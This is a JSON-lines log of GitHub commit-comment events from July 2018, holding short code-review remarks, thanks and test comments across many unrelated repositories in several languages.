{"id":"8034976131","type":"CommitCommentEvent","actor":{"login":"zinczinc"},"repo":{"name":"openiddict/openiddict-documentation"},"payload":{"comment":{"id":29878328,"position":50,"line":190,"path":"guide/getting-started.md","commit_id":"513ae6bd6984c7e46aabd1de7e01d43d4daa6f4f","created_at":"2018-07-30T01:09:11Z","updated_at":"2018-07-30T01:09:11Z","author_association":"NONE","body":"We can replace this with: if (await manager.FindByClientIdAsync(\"[client identifier]\", cancellationToken) == null)"}},"created_at":"2018-07-30T01:09:11Z"}
{"id":"8034976698","type":"CommitCommentEvent","actor":{"login":"halabjaee"},"repo":{"name":"halabjaee/bot"},"payload":{"comment":{"id":29878329,"position":4,"line":90,"path":"plugins/inpm.lua","commit_id":"e95d546ea0e00a0bf1793f951776ba062807573c","created_at":"2018-07-30T01:09:31Z","updated_at":"2018-07-30T01:09:31Z","author_association":"OWNER","body":"@Halabjaee"}},"created_at":"2018-07-30T01:09:31Z"}
{"id":"8034979999","type":"CommitCommentEvent","actor":{"login":"halabjaee"},"repo":{"name":"halabjaee/bot"},"payload":{"comment":{"id":29878333,"position":5,"line":90,"path":"plugins/inpm.lua","commit_id":"e95d546ea0e00a0bf1793f951776ba062807573c","created_at":"2018-07-30T01:11:21Z","updated_at":"2018-07-30T01:11:21Z","author_association":"OWNER","body":"@Halabjaee"}},"created_at":"2018-07-30T01:11:21Z"}
{"id":"8034980481","type":"CommitCommentEvent","actor":{"login":"ragichug"},"repo":{"name":"ragichug/ragichug.github.io"},"payload":{"comment":{"id":29878336,"position":null,"line":null,"path":null,"commit_id":"e781b7b553c5d236470cd1d48f54742644e68dfb","created_at":"2018-07-30T01:11:36Z","updated_at":"2018-07-30T01:11:36Z","author_association":"OWNER","body":"r"}},"created_at":"2018-07-30T01:11:36Z"}
{"id":"8034983057","type":"CommitCommentEvent","actor":{"login":"rogerhub"},"repo":{"name":"Homebrew/homebrew-cask"},"payload":{"comment":{"id":29878343,"position":null,"line":null,"path":null,"commit_id":"576bc16dba3469311a803cf06bd59617c810a430","created_at":"2018-07-30T01:12:57Z","updated_at":"2018-07-30T01:12:57Z","author_association":"NONE","body":"For anybody else wondering why their autocompletion isn't working: https://bugs.gnucash.org/show_bug.cgi?id=796734"}},"created_at":"2018-07-30T01:12:57Z"}
{"id":"8034983965","type":"CommitCommentEvent","actor":{"login":"halabjaee"},"repo":{"name":"halabjaee/bot"},"payload":{"comment":{"id":29878344,"position":5,"line":90,"path":"plugins/inpm.lua","commit_id":"e95d546ea0e00a0bf1793f951776ba062807573c","created_at":"2018-07-30T01:13:25Z","updated_at":"2018-07-30T01:13:25Z","author_association":"OWNER","body":"@Blakman_Bot"}},"created_at":"2018-07-30T01:13:25Z"}
{"id":"8034989870","type":"CommitCommentEvent","actor":{"login":"halabjaee"},"repo":{"name":"halabjaee/bot"},"payload":{"comment":{"id":29878360,"position":5,"line":90,"path":"plugins/inpm.lua","commit_id":"e95d546ea0e00a0bf1793f951776ba062807573c","created_at":"2018-07-30T01:16:35Z","updated_at":"2018-07-30T01:16:35Z","author_association":"OWNER","body":"@bodygard11"}},"created_at":"2018-07-30T01:16:35Z"}
{"id":"8034991644","type":"CommitCommentEvent","actor":{"login":"Shana6"},"repo":{"name":"MonikaDiscord/Monika"},"payload":{"comment":{"id":29878369,"position":null,"line":null,"path":null,"commit_id":"97d430aaa0c12212fa08da3c5c0f448d9dcc6d22","created_at":"2018-07-30T01:17:32Z","updated_at":"2018-07-30T01:17:32Z","author_association":"CONTRIBUTOR","body":"thanks i forgot the T was uppercase"}},"created_at":"2018-07-30T01:17:32Z"}
{"id":"8034997753","type":"CommitCommentEvent","actor":{"login":"msyapha"},"repo":{"name":"msyapha/mustapha-blaziz"},"payload":{"comment":{"id":29878380,"position":null,"line":null,"path":null,"commit_id":"dcff18e987e3855523a3f7cb6877167c602e0c97","created_at":"2018-07-30T01:20:38Z","updated_at":"2018-07-30T01:20:38Z","author_association":"OWNER","body":"^_^"}},"created_at":"2018-07-30T01:20:38Z"}
{"id":"8034997855","type":"CommitCommentEvent","actor":{"login":"Shana6"},"repo":{"name":"MonikaDiscord/Monika"},"payload":{"comment":{"id":29878381,"position":null,"line":null,"path":null,"commit_id":"97d430aaa0c12212fa08da3c5c0f448d9dcc6d22","created_at":"2018-07-30T01:20:42Z","updated_at":"2018-07-30T01:20:42Z","author_association":"CONTRIBUTOR","body":"(notices message) **wait that's not a personalized message**"}},"created_at":"2018-07-30T01:20:42Z"}
{"id":"8034999505","type":"CommitCommentEvent","actor":{"login":"imihran"},"repo":{"name":"imihran/Data-Science"},"payload":{"comment":{"id":29878383,"position":null,"line":null,"path":null,"commit_id":"f1ccd17902bd3f555955db6ba841ce248ed6a36d","created_at":"2018-07-30T01:21:34Z","updated_at":"2018-07-30T01:21:34Z","author_association":"OWNER","body":"dw"}},"created_at":"2018-07-30T01:21:34Z"}
{"id":"8035000813","type":"CommitCommentEvent","actor":{"login":"slove0408"},"repo":{"name":"slove0408/springbootconfig"},"payload":{"comment":{"id":29878384,"position":null,"line":null,"path":null,"commit_id":"4ae676622c1086a8e68cfff7de01f264d1e2362b","created_at":"2018-07-30T01:22:08Z","updated_at":"2018-07-30T01:22:08Z","author_association":"OWNER","body":"ceshi"}},"created_at":"2018-07-30T01:22:08Z"}
{"id":"8035001488","type":"CommitCommentEvent","actor":{"login":"slove0408"},"repo":{"name":"slove0408/springbootconfig"},"payload":{"comment":{"id":29878385,"position":null,"line":null,"path":null,"commit_id":"4ae676622c1086a8e68cfff7de01f264d1e2362b","created_at":"2018-07-30T01:22:24Z","updated_at":"2018-07-30T01:22:24Z","author_association":"OWNER","body":"ceshi"}},"created_at":"2018-07-30T01:22:24Z"}
{"id":"8035017581","type":"CommitCommentEvent","actor":{"login":"DXGLdotinfo"},"repo":{"name":"DXGLdotinfo/dxgl"},"payload":{"comment":{"id":29878414,"position":34,"line":1152,"path":"cfgmgr/cfgmgr.c","commit_id":"40de9a78440027252443918f8f369c75a3c82be9","created_at":"2018-07-30T01:30:17Z","updated_at":"2018-07-30T01:30:17Z","author_association":"OWNER","body":"I decided not to ensure the obsolete and current values do not conflict, as before this revision there was a bug that prevented the [hacks] section from being read in the first place."}},"created_at":"2018-07-30T01:30:17Z"}
{"id":"8035017612","type":"CommitCommentEvent","actor":{"login":"robotlolita"},"repo":{"name":"purr-platform/purr"},"payload":{"comment":{"id":29878415,"position":null,"line":null,"path":null,"commit_id":"4905b0d443e8571bd133a1e7bdb8ef0baf96e978","created_at":"2018-07-30T01:30:17Z","updated_at":"2018-07-30T01:30:17Z","author_association":"MEMBER","body":"I think I finally have a good idea of where I want to take it and how to do that. Though I still need to see if my idea of modular protocols will work..."}},"created_at":"2018-07-30T01:30:17Z"}
{"id":"8035018652","type":"CommitCommentEvent","actor":{"login":"SirBorkington337"},"repo":{"name":"micro500/MK64_custom"},"payload":{"comment":{"id":29878417,"position":null,"line":null,"path":null,"commit_id":"e8c18e86927caf967209e027794785c94b6dd447","created_at":"2018-07-30T01:30:47Z","updated_at":"2018-07-30T01:30:47Z","author_association":"NONE","body":"It does, thank you :D"}},"created_at":"2018-07-30T01:30:47Z"}
{"id":"8035019754","type":"CommitCommentEvent","actor":{"login":"ziyi2"},"repo":{"name":"EmptyCup20/easy-tool-front"},"payload":{"comment":{"id":29878421,"position":20,"line":18,"path":"bin/pull.js","commit_id":"24328d5b2c891f6aba57ee312a67976df00c0dc5","created_at":"2018-07-30T01:31:20Z","updated_at":"2018-07-30T01:31:20Z","author_association":"CONTRIBUTOR","body":"直接取来的是字符串，因为这个easy.config.js的读取读取的是文件内容，不是通过require的形式加载json文件"}},"created_at":"2018-07-30T01:31:20Z"}
{"id":"8035020382","type":"CommitCommentEvent","actor":{"login":"b606"},"repo":{"name":"Ludeon/RimWorld-fr"},"payload":{"comment":{"id":29878422,"position":66,"line":56,"path":"DefInjected/ThoughtDef/Thoughts_Situation_Traits.xml","commit_id":"ac0f933ae3c457a6a9dc8fe6d7029d0241717b7b","created_at":"2018-07-30T01:31:34Z","updated_at":"2018-07-30T01:31:34Z","author_association":"CONTRIBUTOR","body":"Pourquoi \"avide d'une chambre **non** impréssionnante\" ici ?"}},"created_at":"2018-07-30T01:31:34Z"}
{"id":"8035028284","type":"CommitCommentEvent","actor":{"login":"hotdog23"},"repo":{"name":"hotdog23/cs1531_lab01"},"payload":{"comment":{"id":29878430,"position":null,"line":null,"path":null,"commit_id":"dd8cd001422c259ce337bbda8cb3d74a98b0c69a","created_at":"2018-07-30T01:35:10Z","updated_at":"2018-07-30T01:35:10Z","author_association":"OWNER","body":"HOW DO YOU UPDATE YOUR FILES"}},"created_at":"2018-07-30T01:35:10Z"}
{"id":"8035030998","type":"CommitCommentEvent","actor":{"login":"ziyi2"},"repo":{"name":"EmptyCup20/easy-tool-front"},"payload":{"comment":{"id":29878433,"position":20,"line":18,"path":"bin/pull.js","commit_id":"24328d5b2c891f6aba57ee312a67976df00c0dc5","created_at":"2018-07-30T01:36:28Z","updated_at":"2018-07-30T01:36:28Z","author_association":"CONTRIBUTOR","body":"直接取来的是字符串，因为这个easy.config.js的读取读取的是文件内容，不是通过require的形式加载json文件 @xxholly32"}},"created_at":"2018-07-30T01:36:28Z"}
{"id":"8035032560","type":"CommitCommentEvent","actor":{"login":"bajaiffer"},"repo":{"name":"Findus23/plugin-LanguageToogle"},"payload":{"comment":{"id":29878439,"position":4,"line":4,"path":"plugin.json","commit_id":"ff77a9e6c8d37a54ee3a9c1582aeec8eaa9f6b17","created_at":"2018-07-30T01:37:12Z","updated_at":"2018-07-30T01:37:12Z","author_association":"NONE","body":"Ara"}},"created_at":"2018-07-30T01:37:12Z"}
{"id":"8035038489","type":"CommitCommentEvent","actor":{"login":"LV0404"},"repo":{"name":"xiumu2017/MyDailyWork"},"payload":{"comment":{"id":29878452,"position":null,"line":null,"path":null,"commit_id":"3593f4e03829893d37ade36a14556e5796bc36dc","created_at":"2018-07-30T01:39:56Z","updated_at":"2018-07-30T01:39:56Z","author_association":"NONE","body":"啊喽哈~"}},"created_at":"2018-07-30T01:39:56Z"}
{"id":"8035039413","type":"CommitCommentEvent","actor":{"login":"timsully"},"repo":{"name":"timsully/learn_ruby_the_hard_way"},"payload":{"comment":{"id":29878454,"position":null,"line":null,"path":null,"commit_id":"33acc3c177329227770564fb26851ac1a5356643","created_at":"2018-07-30T01:40:15Z","updated_at":"2018-07-30T01:40:15Z","author_association":"OWNER","body":"Created this to have a clean working tree when adding `ex*.rb` files"}},"created_at":"2018-07-30T01:40:15Z"}
{"id":"8035042931","type":"CommitCommentEvent","actor":{"login":"raje2411"},"repo":{"name":"raje2411/Java_Learning_repo"},"payload":{"comment":{"id":29878456,"position":22,"line":22,"path":"java_projects/src/java_projects/Guess_Game.java","commit_id":"1d27186361c3c7d62e3952e2de12d583f4fcdd76","created_at":"2018-07-30T01:41:46Z","updated_at":"2018-07-30T01:41:46Z","author_association":"OWNER","body":"for loop"}},"created_at":"2018-07-30T01:41:46Z"}
{"id":"8035045426","type":"CommitCommentEvent","actor":{"login":"raje2411"},"repo":{"name":"raje2411/Java_Learning_repo"},"payload":{"comment":{"id":29878461,"position":26,"line":26,"path":"java_projects/src/java_projects/Guess_Game.java","commit_id":"1d27186361c3c7d62e3952e2de12d583f4fcdd76","created_at":"2018-07-30T01:42:57Z","updated_at":"2018-07-30T01:42:57Z","author_association":"OWNER","body":"ssss\r\n\r\n> Good"}},"created_at":"2018-07-30T01:42:57Z"}
{"id":"8035053566","type":"CommitCommentEvent","actor":{"login":"dmihalimm"},"repo":{"name":"desktop/desktop"},"payload":{"comment":{"id":29878483,"position":null,"line":null,"path":null,"commit_id":"56b1fe71f59d3f59202f5949ebc48af606e5f89c","created_at":"2018-07-30T01:46:26Z","updated_at":"2018-07-30T01:46:26Z","author_association":"NONE","body":"pukimak\n\nOn 27 July 2018 at 14:26, parvaizmuhd <notifications@github.com> wrote:\n\n> no understand fuck account\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/desktop/desktop/commit/56b1fe71f59d3f59202f5949ebc48af606e5f89c#commitcomment-29854364>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/An0Z6joMoT7tPInhkQ2-Wvn-K0MJth3Xks5uKrKngaJpZM4VZ5E2>\n> .\n>\n"}},"created_at":"2018-07-30T01:46:26Z"}
{"id":"8035062647","type":"CommitCommentEvent","actor":{"login":"wendal"},"repo":{"name":"nutzam/nutzmore"},"payload":{"comment":{"id":29878500,"position":null,"line":null,"path":null,"commit_id":"26408d2ce6080958e1eb45af3629f80a1295d950","created_at":"2018-07-30T01:50:32Z","updated_at":"2018-07-30T01:50:32Z","author_association":"MEMBER","body":"只是把shiro的demo独立到一个库"}},"created_at":"2018-07-30T01:50:32Z"}
{"id":"8035064705","type":"CommitCommentEvent","actor":{"login":"Counterply"},"repo":{"name":"Counterply/asmFish"},"payload":{"comment":{"id":29878509,"position":8,"line":1458,"path":"x86/SearchMacros.asm","commit_id":"1bf7829e68602a267498b1261a81f5c85349e3a2","created_at":"2018-07-30T01:51:28Z","updated_at":"2018-07-30T01:51:28Z","author_association":"OWNER","body":"Just adding in `xor eax, eax` doesn't make sense since you are just hammering a value in eax that shouldn't be constructed in the first place. The whole point to this simplification is to save on the two calls to memory and the conditional move which are very cpu-expensive."}},"created_at":"2018-07-30T01:51:28Z"}
{"id":"8035065571","type":"CommitCommentEvent","actor":{"login":"baoti"},"repo":{"name":"airbnb/epoxy"},"payload":{"comment":{"id":29878511,"position":11,"line":60,"path":"kotlinsample/src/main/java/com/airbnb/epoxy/kotlinsample/ExampleKotlinModels.kt","commit_id":"0f521f07fb428b9f6f9efb98b6dbde3b21f48b0f","created_at":"2018-07-30T01:51:53Z","updated_at":"2018-07-30T01:51:53Z","author_association":"CONTRIBUTOR","body":"It is different from the sample in wiki. Is it an intentional change? Does it need a `DoNotHash` option?"}},"created_at":"2018-07-30T01:51:53Z"}
{"id":"8035074450","type":"CommitCommentEvent","actor":{"login":"KyleSiefring"},"repo":{"name":"tdaede/rd_tool"},"payload":{"comment":{"id":29878531,"position":57,"line":112,"path":"awsremote.py","commit_id":"3fbc7f663b36c004421deace5e457e8c359ebed5","created_at":"2018-07-30T01:55:47Z","updated_at":"2018-07-30T01:55:47Z","author_association":"CONTRIBUTOR","body":"While loop is gone. If we have a hiccup and instance_id won't be added to ok_instance_ids in the new code."}},"created_at":"2018-07-30T01:55:47Z"}
{"id":"8035076039","type":"CommitCommentEvent","actor":{"login":"KyleSiefring"},"repo":{"name":"tdaede/rd_tool"},"payload":{"comment":{"id":29878536,"position":85,"line":112,"path":"awsremote.py","commit_id":"3fbc7f663b36c004421deace5e457e8c359ebed5","created_at":"2018-07-30T01:56:31Z","updated_at":"2018-07-30T01:56:31Z","author_association":"CONTRIBUTOR","body":"We return machines that are in ok_instance_ids."}},"created_at":"2018-07-30T01:56:31Z"}
{"id":"8035078334","type":"CommitCommentEvent","actor":{"login":"RMerl"},"repo":{"name":"RMerl/asuswrt-merlin.ng"},"payload":{"comment":{"id":29878537,"position":null,"line":null,"path":null,"commit_id":"3f7e51000dfd8efc0d60ffcd291bc4fb1aa83d0f","created_at":"2018-07-30T01:57:30Z","updated_at":"2018-07-30T01:57:30Z","author_association":"OWNER","body":"Juggling with repos like this would be problematic for forks or people with a local git clone.  That's why I opted to leave it there as-is, and go with a new current repo instead."}},"created_at":"2018-07-30T01:57:30Z"}
{"id":"8035078396","type":"CommitCommentEvent","actor":{"login":"KyleSiefring"},"repo":{"name":"tdaede/rd_tool"},"payload":{"comment":{"id":29878538,"position":72,"line":259,"path":"rd_server.py","commit_id":"3fbc7f663b36c004421deace5e457e8c359ebed5","created_at":"2018-07-30T01:57:32Z","updated_at":"2018-07-30T01:57:32Z","author_association":"CONTRIBUTOR","body":"Call the method that has my comments on it."}},"created_at":"2018-07-30T01:57:32Z"}
{"id":"8035080290","type":"CommitCommentEvent","actor":{"login":"FamousMai"},"repo":{"name":"FamousMai/laravel01"},"payload":{"comment":{"id":29878548,"position":null,"line":null,"path":null,"commit_id":"fb8f9f291c683b21a5f99bda9b117fd273bb2947","created_at":"2018-07-30T01:58:19Z","updated_at":"2018-07-30T01:58:19Z","author_association":"OWNER","body":"完成 第十章 微博CRUD"}},"created_at":"2018-07-30T01:58:19Z"}
{"id":"8035081636","type":"CommitCommentEvent","actor":{"login":"FamousMai"},"repo":{"name":"FamousMai/laravel01"},"payload":{"comment":{"id":29878549,"position":null,"line":null,"path":null,"commit_id":"7e0f594856ac41d8ab134b0e4e71143d20f8aba8","created_at":"2018-07-30T01:58:50Z","updated_at":"2018-07-30T01:58:50Z","author_association":"OWNER","body":"完成 第九章 邮件发送"}},"created_at":"2018-07-30T01:58:50Z"}
{"id":"8036705694","type":"CommitCommentEvent","actor":{"login":"gizmo753"},"repo":{"name":"sindresorhus/refined-github"},"payload":{"comment":{"id":29884303,"position":null,"line":null,"path":null,"commit_id":"4ec9576169f13b381d8b5e4bfb4eab431a66640c","created_at":"2018-07-30T10:00:20Z","updated_at":"2018-07-30T10:00:20Z","author_association":"NONE","body":"Thanks"}},"created_at":"2018-07-30T10:00:20Z"}
{"id":"8036707577","type":"CommitCommentEvent","actor":{"login":"gizmo753"},"repo":{"name":"sindresorhus/refined-github"},"payload":{"comment":{"id":29884310,"position":null,"line":null,"path":null,"commit_id":"4ec9576169f13b381d8b5e4bfb4eab431a66640c","created_at":"2018-07-30T10:00:40Z","updated_at":"2018-07-30T10:00:40Z","author_association":"NONE","body":"😁"}},"created_at":"2018-07-30T10:00:40Z"}
{"id":"8036709350","type":"CommitCommentEvent","actor":{"login":"hasehiro25"},"repo":{"name":"hasehiro25/kuso_blog_project"},"payload":{"comment":{"id":29884311,"position":5,"line":15,"path":"app/assets/javascripts/images.coffee","commit_id":"09f7f283648af8940e369c7e44cf2ce2e54de8d7","created_at":"2018-07-30T10:00:59Z","updated_at":"2018-07-30T10:00:59Z","author_association":"OWNER","body":"なるほど！"}},"created_at":"2018-07-30T10:00:59Z"}
{"id":"8036714107","type":"CommitCommentEvent","actor":{"login":"elevinskii"},"repo":{"name":"elevinskii/magento2-theme-deepfish"},"payload":{"comment":{"id":29884322,"position":10,"line":10,"path":"app/design/frontend/IdealCode/DeepFish/Magento_Search/web/js/form.js","commit_id":"0fde2002057fbd5e88782042a987f471e2e0f3a6","created_at":"2018-07-30T10:01:53Z","updated_at":"2018-07-30T10:01:53Z","author_association":"OWNER","body":"`this._super().observe({items: []});`"}},"created_at":"2018-07-30T10:01:53Z"}
{"id":"8036714671","type":"CommitCommentEvent","actor":{"login":"beryli"},"repo":{"name":"erictaur/Course-Query"},"payload":{"comment":{"id":29884324,"position":103,"line":103,"path":"InnoServ/logincss.css","commit_id":"f8e6016c5a5079d0121b2a19bf700bb964114fc3","created_at":"2018-07-30T10:02:00Z","updated_at":"2018-07-30T10:02:00Z","author_association":"NONE","body":"jkljkl"}},"created_at":"2018-07-30T10:02:00Z"}
{"id":"8036725540","type":"CommitCommentEvent","actor":{"login":"Komzpa"},"repo":{"name":"Algunenano/postgis"},"payload":{"comment":{"id":29884336,"position":5,"line":7,"path":"regress/subdivide_expected","commit_id":"082e1e53a7514f8183f88fa03bd439687c66f781","created_at":"2018-07-30T10:04:09Z","updated_at":"2018-07-30T10:04:09Z","author_association":"NONE","body":"29321996468.6 - 29267648528.7 = 54347939.89999771 m^2 of area is lost in this change."}},"created_at":"2018-07-30T10:04:09Z"}
{"id":"8036730107","type":"CommitCommentEvent","actor":{"login":"gizmo753"},"repo":{"name":"sindresorhus/refined-github"},"payload":{"comment":{"id":29884349,"position":null,"line":null,"path":null,"commit_id":"0184fafcfdacff4a2778e34242de92b5bdd2c177","created_at":"2018-07-30T10:05:04Z","updated_at":"2018-07-30T10:05:04Z","author_association":"NONE","body":"😁"}},"created_at":"2018-07-30T10:05:04Z"}
{"id":"8036749498","type":"CommitCommentEvent","actor":{"login":"morphet81"},"repo":{"name":"overtrue/wechat"},"payload":{"comment":{"id":29884387,"position":null,"line":null,"path":null,"commit_id":"22ba22f3cd4d774b5dbc54e3051de7de9a51b59b","created_at":"2018-07-30T10:09:02Z","updated_at":"2018-07-30T10:09:02Z","author_association":"NONE","body":"@mingyoung I thought that was done, but apparently the process was not finished ^^\r\nWill try again"}},"created_at":"2018-07-30T10:09:02Z"}
{"id":"8036750208","type":"CommitCommentEvent","actor":{"login":"HotIceCream"},"repo":{"name":"iliailemkov/CurrencyHolder"},"payload":{"comment":{"id":29884389,"position":22,"line":24,"path":"app/src/main/java/com/example/beardie/currencyholder/BaseApplication.kt","commit_id":"951ac7dd66a3db11af903758a5cdfd93c7cb26f9","created_at":"2018-07-30T10:09:11Z","updated_at":"2018-07-30T10:09:11Z","author_association":"NONE","body":"А разве фабрик не делает это по-умолчанию?"}},"created_at":"2018-07-30T10:09:11Z"}
{"id":"8036750501","type":"CommitCommentEvent","actor":{"login":"baffioso"},"repo":{"name":"regiongis/python_helpers"},"payload":{"comment":{"id":29884390,"position":null,"line":null,"path":null,"commit_id":"7e41d135180e1eb9047b67ec21b9738d12664653","created_at":"2018-07-30T10:09:15Z","updated_at":"2018-07-30T10:09:15Z","author_association":"NONE","body":"Ser umiddelbart fint ud. Måske har man til tider brug for nogle at kunne sætte nogle af de andre parametre [to_spl](https://pandas.pydata.org/pandas-docs/version/0.22/generated/pandas.DataFrame.to_sql.html). Har f.eks. haft behov for dtype"}},"created_at":"2018-07-30T10:09:15Z"}
{"id":"8036759528","type":"CommitCommentEvent","actor":{"login":"siutung"},"repo":{"name":"consenlabs/token-profile"},"payload":{"comment":{"id":29884404,"position":null,"line":null,"path":null,"commit_id":"78d4deb3f38abe7d0370f790cc433c36ec7a3ae4","created_at":"2018-07-30T10:11:08Z","updated_at":"2018-07-30T10:11:08Z","author_association":"CONTRIBUTOR","body":"请问我的json文件是有什么错误吗？"}},"created_at":"2018-07-30T10:11:08Z"}
{"id":"8036760935","type":"CommitCommentEvent","actor":{"login":"HotIceCream"},"repo":{"name":"iliailemkov/CurrencyHolder"},"payload":{"comment":{"id":29884410,"position":14,"line":14,"path":"app/src/main/java/com/example/beardie/currencyholder/data/CategoryRepository.kt","commit_id":"951ac7dd66a3db11af903758a5cdfd93c7cb26f9","created_at":"2018-07-30T10:11:24Z","updated_at":"2018-07-30T10:11:24Z","author_association":"NONE","body":"Может стоит звести utils метод, который принимает на вход значение и возвращает MutableLiveData с этим значением? И заменить им несколько методов ниже"}},"created_at":"2018-07-30T10:11:24Z"}
{"id":"8036761306","type":"CommitCommentEvent","actor":{"login":"Mumtaz12"},"repo":{"name":"Mumtaz12/special"},"payload":{"comment":{"id":29884415,"position":null,"line":null,"path":null,"commit_id":"1c7469d982f5dcfbda526be33f92b2363db5b6aa","created_at":"2018-07-30T10:11:29Z","updated_at":"2018-07-30T10:11:29Z","author_association":"OWNER","body":"Tynks bro..."}},"created_at":"2018-07-30T10:11:29Z"}
{"id":"8036767305","type":"CommitCommentEvent","actor":{"login":"k-gavrilov"},"repo":{"name":"k-gavrilov/ruby_basic"},"payload":{"comment":{"id":29884433,"position":14,"line":14,"path":"railway_road/instance_counter.rb","commit_id":"a58058b9410d1c35ff0ef96e117a8c9e7132918d","created_at":"2018-07-30T10:12:45Z","updated_at":"2018-07-30T10:12:45Z","author_association":"OWNER","body":"Мне кажется, что без него будет ошибка, что нет метода сэттера при вызове register_instance. Вечером поиграюсь."}},"created_at":"2018-07-30T10:12:45Z"}
{"id":"8036767536","type":"CommitCommentEvent","actor":{"login":"HotIceCream"},"repo":{"name":"iliailemkov/CurrencyHolder"},"payload":{"comment":{"id":29884435,"position":22,"line":22,"path":"app/src/main/java/com/example/beardie/currencyholder/data/ExchangeRepository.kt","commit_id":"951ac7dd66a3db11af903758a5cdfd93c7cb26f9","created_at":"2018-07-30T10:12:48Z","updated_at":"2018-07-30T10:12:48Z","author_association":"NONE","body":"давай apiService через зависимость сюда будем провайдить, а не создавать каждый раз.\r\n\r\nНемного неожиданно видеть запрос с Callback. Почему именно так?"}},"created_at":"2018-07-30T10:12:48Z"}
{"id":"8036768029","type":"CommitCommentEvent","actor":{"login":"DariaKalinina"},"repo":{"name":"DariaKalinina/basic-react-13-11"},"payload":{"comment":{"id":29884437,"position":4,"line":1,"path":"src/components/App.js","commit_id":"0ffde75219ede876f024f651f02af25ca8920ff0","created_at":"2018-07-30T10:12:54Z","updated_at":"2018-07-30T10:12:54Z","author_association":"OWNER","body":"Как быть с import React, {PureComponent} from 'react'? И мне сейчас не понадобилось *as - и так получается - \"extends React.Component\""}},"created_at":"2018-07-30T10:12:54Z"}
{"id":"8036771680","type":"CommitCommentEvent","actor":{"login":"JordyMoos"},"repo":{"name":"jlengrand/elm-dungeon"},"payload":{"comment":{"id":29884454,"position":null,"line":null,"path":null,"commit_id":"8bc065a539570381bbb4c605f76deff1dc8488bc","created_at":"2018-07-30T10:13:41Z","updated_at":"2018-07-30T10:13:41Z","author_association":"NONE","body":"I meant this\r\n\r\n```elm\r\nhasActorId : Int -> Actors -> Bool\r\nhasActorId actorId =\r\n    List.any\r\n      (\\actor -> actor.id == actorId)\r\n```\r\n\r\nBut you could actually write it like this.\r\nPretty cool that it can.\r\nNot sure if it is more readable ;P\r\n\r\n```elm\r\nhasActorId : Int -> Actors -> Bool\r\nhasActorId actorId =\r\n    List.any (.id >> (==) actorId)\r\n```"}},"created_at":"2018-07-30T10:13:41Z"}
{"id":"8036774167","type":"CommitCommentEvent","actor":{"login":"viktorianer"},"repo":{"name":"cloudfoundry-community/nginx-release"},"payload":{"comment":{"id":29884467,"position":null,"line":null,"path":null,"commit_id":"9ff230e4c404210ad6c3eb7bfc723d1f25cd4207","created_at":"2018-07-30T10:14:12Z","updated_at":"2018-07-30T10:14:12Z","author_association":"NONE","body":"I am trying to use this manifest...:\r\n\r\n`bosh -e vbox -d nginx deploy manifests/nginx_reverse_proxy_with_auth.yml`\r\n\r\n\r\n...and get an error:\r\n\r\n```\r\nUsing environment '192.168.50.6' as client 'admin'\r\n\r\nUsing deployment 'nginx'\r\n\r\nContinue? [yN]: y\r\n...\r\nError: - Failed to find variable '/bosh-lite/nginx/system_domain' from config server: HTTP Code '404', Error: 'The request could not be completed because the credential does not exist or you do not have sufficient authorization.'\r\n```"}},"created_at":"2018-07-30T10:14:12Z"}
{"id":"8036779851","type":"CommitCommentEvent","actor":{"login":"HotIceCream"},"repo":{"name":"iliailemkov/CurrencyHolder"},"payload":{"comment":{"id":29884486,"position":20,"line":20,"path":"app/src/main/java/com/example/beardie/currencyholder/data/api/ExchangeApiService.kt","commit_id":"951ac7dd66a3db11af903758a5cdfd93c7cb26f9","created_at":"2018-07-30T10:15:21Z","updated_at":"2018-07-30T10:15:21Z","author_association":"NONE","body":"я уже писал выше  - вынести этот метод в модуль даггера."}},"created_at":"2018-07-30T10:15:21Z"}
{"id":"8036780446","type":"CommitCommentEvent","actor":{"login":"danielarnason"},"repo":{"name":"regiongis/python_helpers"},"payload":{"comment":{"id":29884493,"position":null,"line":null,"path":null,"commit_id":"7e41d135180e1eb9047b67ec21b9738d12664653","created_at":"2018-07-30T10:15:28Z","updated_at":"2018-07-30T10:15:28Z","author_association":"CONTRIBUTOR","body":"Det skal vi så bare lige tilføje som en optional parameter. \r\n\r\nJeg ved ikke helt, hvordan man skal definere en primary key, når man indlæser data via pandas. Har du prøvet det før?"}},"created_at":"2018-07-30T10:15:28Z"}
{"id":"8036781339","type":"CommitCommentEvent","actor":{"login":"vladimirsazhin"},"repo":{"name":"fletcherist/yandex-dialogs-sdk"},"payload":{"comment":{"id":29884496,"position":66,"line":48,"path":"README.md","commit_id":"dab2208629b28c35e23b2834a5bf91c5cb2d4c2e","created_at":"2018-07-30T10:15:41Z","updated_at":"2018-07-30T10:15:41Z","author_association":"NONE","body":"Недокументированный метод."}},"created_at":"2018-07-30T10:15:41Z"}
{"id":"8036783765","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29884502,"position":null,"line":null,"path":null,"commit_id":"2e7a3eff07fe9dcc88efe5e442a9c809e3965248","created_at":"2018-07-30T10:16:12Z","updated_at":"2018-07-30T10:16:12Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-324](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-324).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-324-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-30T10:16:12Z"}
{"id":"8036788852","type":"CommitCommentEvent","actor":{"login":"jezzdk"},"repo":{"name":"RobinCK/vue-popper"},"payload":{"comment":{"id":29884518,"position":null,"line":null,"path":null,"commit_id":"ba7e5f917ca8aa096ea96955cd447db5a37b26e3","created_at":"2018-07-30T10:17:18Z","updated_at":"2018-07-30T10:17:18Z","author_association":"NONE","body":"This version is not showing up in npm registry."}},"created_at":"2018-07-30T10:17:18Z"}
